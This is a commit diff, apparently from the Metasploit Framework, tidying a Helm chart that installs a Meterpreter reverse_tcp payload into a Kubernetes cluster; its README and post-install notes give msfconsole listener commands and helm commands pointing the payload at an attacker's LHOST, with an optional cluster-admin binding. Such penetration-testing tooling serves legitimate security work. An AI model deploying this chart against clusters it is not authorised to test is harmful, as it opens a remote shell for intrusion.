Meterpreter Helm chart tweaks

2021-11-05 14:22:45 +00:00
parent 8d7d25ed1b
commit ee093d0c21
8 changed files with 59 additions and 67 deletions
@@ -1,3 +1,3 @@
 metasploit/charts
 metasploit.yaml
-meterpreter.yaml
+meterpreter.yaml
@@ -1,26 +1,23 @@
-#
-# 
-#
 .SECONDARY:
 .SECONDEXPANSION:

 lint-charts: ##@Lint Lint Helm Chart
-	helm lint meterpreter    
+	helm lint meterpreter

 generate-deployment:	##@Generate Generate YAML based deployment
-	helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml   
+	helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml

 install-meterpreter: ##@meterpreter Install meterpreter chart
 	helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter

-delete-meterpreter: ##@meterpreter Delete meterpreter chart    
-	helm -n metasploit delete meterpreter    
+delete-meterpreter: ##@meterpreter Delete meterpreter chart
+	helm -n metasploit delete meterpreter


-create-kind-cluster:  ##@Test create KIND cluster
+create-kind-cluster:  ##@Test create kind cluster
 	kind create cluster --image kindest/node:v1.18.2 --name metasploit

-delete-kind-cluster:  ##@Test delete KIND cluster
+delete-kind-cluster:  ##@Test delete kind cluster
 	kind delete cluster --name metasploit


@@ -1,46 +1,37 @@
+# Metasploit in Kubernetes

-# Running Metasploit Framework Against Kubernetes
+The most common workflow to test a Kubernetes environment with Metasploit is to target the Kubernetes API externally,
+or through a compromised container - both of these workflows are currently supported directly within msfconsole.

-Running metasploit framework against Kubernetes enables pentesters to security test cluster components such as the API Server, as well as internal application components or micro-services.
+An alternative to compromising a Kubernetes container to gain a Meterpreter session is to install the `meterpreter` helm chart into
+a Kubernetes environment directly. This newly opened Meterpreter session will act as the pivot point for running additional
+Metasploit modules, similar to the behavior of compromising an existing Kubernetes container with msfconsole.

-The installation chart (meterpreter) also offers to install & run a metasploit payload, that connects back to metasploit console.
-The payload can be deployed with different priviliges and permissions with respect to Kubernetes node hosting metasploit payload, as well as Kubernetes API server itself - see 'priviliges' section under values.yaml
+## Installation

-```yaml
-priviliges:
-  # Disable Kubernetes API Server Access - even to the discovery APIs
-  useServiceAccount: true
-  # Run metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
-  bindClusterRole: "" #cluster-admin 
+To install the Metasploit resources in to your Kubernetes environment: 

-  #
-  # Priviliges related to node hosting metasploit Pod
-  # See: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
-  podSecurityContext: {}
-    # fsGroup: 2000
-  # Metasploit container security context
-  securityContext: {}
-    #allowPrivilegeEscalation: false
-    # capabilities:
-    #   add:
-    #   - NET_BIND_SERVICE
-    #   drop:
-    #   - all
-    #runAsNonRoot: true
-    #runAsUser: 1000
-    #runAsGroup: 1000
+1. Make sure [Helm](https://helm.sh/) (version 3 or above) is [installed](https://helm.sh/docs/intro/install/)
+2. Make sure you have an available Kubernetes cluster to deploy Metasploit. You can install a local Kubernetes cluster using [kind](https://kind.sigs.k8s.io/docs/user/quick-start/#installation)
+   You can create local kind cluster by running  `make create-kind-cluster`
+2. A penester should create a Metasploit listener from msfconsole:
+```
+use payload/linux/x64/meterpreter/reverse_tcp
+set LHOST x.x.x.x
+set LPORT 4444
+to_handler
 ```
-
-# Installation
-
-1. Make sure helm (version 3 or above) is [installed](https://helm.sh/docs/intro/install/)
-2. Make sure you have an available Kubernetes cluster to deploy metasploit. You can install a local Kubernetes cluster using [KIND](https://kind.sigs.k8s.io/docs/user/quick-start/#installation)
-    > You can create local KIND cluster by running  `make create-kind-cluster`

 3. Install meterpreter helm chart by running:

 ```sh
-export MSF_PORT="<routeable port from inside cluster>"
-export MSF_IPADDRESS="<routeable ip from inside cluster>"
-helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lport=$MSF_PORT --set lhost=$MSF_IPADDRESS
+export LHOST="x.x.x.x"
+export LPORT="4444"
+helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lhost=$LHOST --set lport=$LPORT
 ```
+4. If the listener from step 3 was created, ensure you now have a Meterpreter session in msfconsole
+
+## Privileges
+
+The Meterpreter container can be deployed with different privileges and permissions - see the `privileges` section within
+[./meterpreter/values.yaml](values.yaml) for more details.
@@ -10,9 +10,6 @@ keywords:
  - pentest
  - penetration testing
 home: https://www.metasploit.com/
-icon: https://www.metasploit.com/includes/images/metasploit-r7-logo.svg
+icon: https://www.metasploit.com/includes/images/metasploit-og.png
 sources:
 - https://github.com/rapid7/metasploit-framework
-maintainers:
- email: msfdev@metasploit.com
-  name: Metasploit Hackers
@@ -1 +1,8 @@
-Make sure meterpreter connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}}
+Make sure meterpreter connected to your Metasploit listener running at {{ .Values.lhost }}:{{ .Values.lport }}
+
+You can create a Metasploit listener with:
+
+use payload/linux/x64/meterpreter/reverse_tcp
+set LHOST {{ .Values.lhost }}
+set LPORT {{ .Values.lport }}
+to_handler
@@ -18,17 +18,17 @@ spec:
      imagePullSecrets:
        {{- toYaml . | nindent 8 }}
    {{- end }}
-      {{- if .Values.priviliges.useServiceAccount }}
+      {{- if .Values.privileges.useServiceAccount }}
      serviceAccountName: {{ include "meterpreter.fullname" . }}
      {{ else }}
      automountServiceAccountToken: false
      {{ end }}
      securityContext:
-        {{- toYaml .Values.priviliges.podSecurityContext | nindent 8 }}
+        {{- toYaml .Values.privileges.podSecurityContext | nindent 8 }}
      initContainers:
        - name: msfvenome
          image: "{{ .Values.image.repository}}:{{ .Values.image.tag }}"
-          imagePullPolicy: {{ .Values.image.pullPolicy }}        
+          imagePullPolicy: {{ .Values.image.pullPolicy }}
          command: ["/bin/bash", "-c", "/tmp/meterpreter.sh"]
          env:
            - name: LHOST
@@ -41,23 +41,23 @@ spec:
            - name: msfvenome
              mountPath: /tmp/meterpreter.sh
              subPath: meterpreter.sh
-              
+
      containers:
        - name: {{ .Chart.Name }}
          image: gcr.io/google_containers/pause-amd64:3.0
-          imagePullPolicy: {{ .Values.image.pullPolicy }}        
+          imagePullPolicy: {{ .Values.image.pullPolicy }}
          command: ["/meterpreter/meterpreter"]
          tty: true
          stdin: true
          securityContext:
-            {{- toYaml .Values.priviliges.securityContext | nindent 12 }}
+            {{- toYaml .Values.privileges.securityContext | nindent 12 }}

          resources:
            {{- toYaml .Values.resources | nindent 12 }}
          volumeMounts:
            - name: meterpreter
              mountPath: /meterpreter
- 
+
      restartPolicy: Always
      volumes:
        - name: meterpreter
@@ -1,4 +1,4 @@
-{{- if .Values.priviliges.useServiceAccount -}}
+{{- if .Values.privileges.useServiceAccount -}}
 apiVersion: v1
 kind: ServiceAccount
 metadata:
@@ -7,7 +7,7 @@ metadata:
    {{- include "meterpreter.labels" . | nindent 4 }}

 ---
-{{- if ne .Values.priviliges.bindClusterRole "" -}}
+{{- if ne .Values.privileges.bindClusterRole "" -}}
 apiVersion: rbac.authorization.k8s.io/v1
 kind: RoleBinding
 metadata:
@@ -17,7 +17,7 @@ metadata:
 roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
-  name: {{ .Values.priviliges.bindClusterRole }}
+  name: {{ .Values.privileges.bindClusterRole }}
 subjects:
  - kind: ServiceAccount
    name: {{ include "meterpreter.fullname" . }}
@@ -1,9 +1,9 @@
 # Default values for meterpreter.

 #The IP Address the payload will connect to
-lhost: 
+lhost:
 #The Port meterpreter will connect to
-lport: 
+lport:

 image:
  repository: metasploitframework/metasploit-framework
@@ -14,15 +14,15 @@ imagePullSecrets: []
 nameOverride: ""
 fullnameOverride: ""

-# Tune the priviliges your Kubernetes meterpreter will run with 
-priviliges:
+# Tune the privileges your Kubernetes meterpreter will run with
+privileges:
  # Disable Kubernetes API Server Access - even to the discovery APIs
  useServiceAccount: true
-  # Run metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
-  bindClusterRole: "" #cluster-admin 
+  # Run Metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
+  bindClusterRole: "" #cluster-admin

  #
-  # Priviliges related to node hosting metasploit Pod
+  # Privileges related to node hosting metasploit Pod
  # See: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
  podSecurityContext: {}
    # fsGroup: 2000